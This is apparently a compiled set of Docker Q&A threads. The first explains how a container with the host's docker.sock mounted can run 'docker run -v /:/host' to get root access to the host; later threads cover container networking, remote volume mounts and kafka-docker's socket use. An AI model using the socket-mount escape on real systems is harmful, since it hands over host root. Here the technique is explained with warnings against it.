I was following the below youtube video linked in the article which allows a docker container to get root access on the host.
There are a few steps which are unclear, can someone please explain how they work further?
https://www.lvh.io/posts/dont-expose-the-docker-socket-not-even-to-a-container.html
Step 1> Bind mount /var/run/docker.sock from host to container
Step 2> Install docker in container <<< at this stage I see that docker ps
-a shows all the containers which are present on the host.
**QUESTION:** How can the container see the containers present on the host? Is it because dockerd on the new container is using /var/run/docker.sock on the host? netstat/ss in the new container doesn't show anything..
Step 3> Run another container from the 1st container. Pass the following parameters to it:
docker run -dit -v /:/host ubuntu
Intention of this is to mount / from host filesystem to /host in the 2nd container being created
**QUESTION:** How does the 1st container have access to / (being filesystem of the host?)
Thanks.
Docker runs as a service on the host machine. This service communicates with clients via a socket which, by default, is the unix socket: unix:/var/run/docker.sock.
When you share this socket with any container, that container will get full access to the docker daemon. From there, the container could start other containers, delete containers/volumes/etc or even map volumes at will from the host to a new container, for example, as is described in your question with -v /:/host. Doing that will give the container root access to the host file system in /host/.
In short: you should be careful sharing this precious socket with any container you don't trust. In some cases the shared socket makes sense (for example portainer: a container that serves as a management GUI to docker).
Related
I have docker on my host machine with a container running. I was wondering if it's possible, and what the best approach would be, to "trigger" a container creation from the running container.
Let's say my machine is host and I have a container called app (with id 123456789) running on host.
root#host $ docker contain ls
123456789 app_mage .... app
I would like to create a container on host from within app
root#123456789 $ docker run --name app2 ...
root#host docker container ls
123456789 app_mage .... app
12345678A app_mage .... app2
What I need is for my app to be running on docker and to run arbitrary applications in an isolated environment (but I'd rather avoid docker-in-docker)
A majority of the Docker community will veer away from these types of designs, however it is very doable.
Similar to Starting and stopping docker container from other container you can simply mount the docker.sock file from the host machine into the container, giving it privilege to access the docker daemon.
To make things more automated, you could use the docker-py sdk to start containers from inside a container, which would in turn access the Docker deamon on the host machine hosting the container that you are spawning more containers from.
For example:
docker run -v /var/run/docker.sock:/var/run/docker.sock image1 --name test1
----
import docker
def create_container():
docker.from_env().containers.run("image2", name="test2")
This example starts container test1, and runs that method inside the newly created container, which in turn creates a new container test2 running on the same host as test1.
In case of I have a machine that running docker (docker host) and spin up some containers inside this docker host,
I need containers' services be able to talk to each other - container expose ports and they also need to resolve by hostname (e.g: example.com)
container A needs to talk to container B with URL: example.com:3000
I've read this article but not quite sure about "inherit" from docker host, does docker host's /etc/hosts will be appended to container's /etc/hosts that running inside docker host?
https://docs.docker.com/engine/reference/run/#managing-etchosts
How to achieve?
Does this "inherit" has any connect to type of docker container networking https://docs.docker.com/v17.09/engine/userguide/networking/ ?
It does not inherit the host's /etc/hosts file. The file inside your container is updated by docker when using the --add-host parameter or extra_hosts in docker-compose. You can add individual records by using extra_hosts in docker-compose (https://docs.docker.com/compose/compose-file/#extra_hosts).
Although if you're just trying to get 2 containers talking to each other you can alternatively connect them to the same network. In docker-compose you can create what's called an external network and have all your docker-compose files reference it. you will then be able to connect by using the full docker container name (eg. http://project_app_1:3000).
See https://docs.docker.com/compose/compose-file/#external
I put the docker host in one machine and put the client in other. Then I try to run some like this from machine 2 (client).
docker -H tcp://machine1:port run -v ./dummy-folder:/dummy-folder alpine sh
Is that dummy-folder going to work through TCP connection?
Is the same valid for docker-compose too?
is the same valid for docker swarm mode?
The volume mount will run locally on the docker host where the container runs, there's no path over the TCP connection for the volume mount (there is a build time packaging of the build context to send that from the client to the server). Swarm is unchanged, if you mount a volume, it will mount on whatever host the container happens to run on.
If you can't replicate your data across the hosts, then you'll want to use a volume mount over the network to a shared storage location or use a volume driver that does the replication for you (e.g. nfs, infinite, glusterfs, flocker).
the scenario: I have a host that has a running docker daemon and a working docker client and socket. I have 1 docker container that was started from the host and has a docker socket mounted within it. It also has a mounted docker client from the host. So I'm able to issue docker commands at will from whithin this docker container using the aforementioned mechanism.
the need: I want to start another docker container from within this docker container; in other words, I want to start a sibling docker container from another sibling docker container.
the problem: A problem arises when I want to mount files that live inside the host filesystem to the sibling container that I want to spin up from the other docker sibling container. It is a problem because when issuing docker run, the docker daemon mounted inside the docker container is really watching the host filesystem. So I need access to the host file system from within the docker container which is trying to start another sibling.
In other words, I need something along the lines of:
# running from within another docker container:
docker run --name another_sibling \
-v {DockerGetHostPath: path_to_host_file}:path_inside_the_sibling \
bash -c 'some_exciting_command'
Is there a way to achieve that? Thanks in advance.
Paths are always on the host, it doesn't matter that you are running the client remotely (or in a container).
Remember: the docker client is just a REST client, the "-v" is always about the daemon's file system.
There are multiple ways to achieve this.
You can always make sure that each container mounts the correct host directory
You can use --volumes-from ie :
docker run -it --volumes-from=keen_sanderson --entrypoint=/bin/bash debian
--volumes-from Mount volumes from the specified container(s)
You can use volumes
I am using docker image for kafka from wurstmeister
The docker-compose file defines a volume such as /var/run/docker.sock:/var/run/docker.sock
What is the purpose of the above unix socket?
When should a docker image declare the above volume?
The kafka-docker project is making (questionable, see below) use of the docker command run inside the kafka container in order to introspect your docker environment. For example, it will determine the advertised kafka port like this:
export KAFKA_ADVERTISED_PORT=$(docker port `hostname` $KAFKA_PORT | sed -r "s/.*:(.*)/\1/g")
There is a broker-list.sh script that looks for kafka brokers like this:
CONTAINERS=$(docker ps | grep 9092 | awk '{print $1}')
In order to run the docker cli inside the container, it needs access to the /var/run/docker.sock socket on your host.
Okay, that's it for the facts. The following is just my personal opinion:
I think this is frankly a terrible idea and that the only containers that should ever have access to the docker socket are those that are explicitly managing containers. There are other mechanisms available for performing container configuration and discovery that do not involve giving the container root access to your host, which is exactly what you are doing when you give something access to the docker socket.
By default, the Docker daemon listens on unix:///var/run/docker.sock to allow only local connections by the root user. So, generally speaking, if we can access to this socket from somewhere else, we can talk to the Docker daemon or extract information about other containers.
If we want some processes inside our container to access to information of other containers managed by the Docker daemon (run on our host), we can declare the volume like above.
Let's see an example from the wurstmeister docker.
The Docker file:
At the end of the file, it will call:
CMD ["start-kafka.sh"]
start-kafka.sh
Let's take a look from the line 6:
if [[ -z "$KAFKA_ADVERTISED_PORT" ]]; then
export KAFKA_ADVERTISED_PORT=$(docker port `hostname` $KAFKA_PORT | sed -r "s/.*:(.*)/\1/g")
fi
When start his Kafka container, he wants to execute below command inside the Kafka container (to find the port mapping to container...):
docker port `hostname` $KAFKA_PORT
Note that he did mount the above volume to be able to execute command like this.
Reference from Docker website(search for the Socket keyword)
What is the purpose of the above unix socket?
Mounting the /var/run/docker.sock socket in a container provides access to the Docker Remote API hosted by the docker daemon. Anyone with access to this socket has complete control of docker and the host running docker (essentially root access).
When should a docker image declare the above volume?
Very rarely. If you are running a docker admin tool that requires API access inside a container then it needs to be mounted (or accessible via TCP) so the tool can manage the hosting docker daemon.
As larsks mentioned, docker-kafka's use of the socket for config discovery is very questionable.
Its not necessary to mount docker.sock file and can be avoided by commenting out appropriate lines in kafka-docker/Dockerfile & start-kafka.sh. No need to add broker-list.sh to kafka container.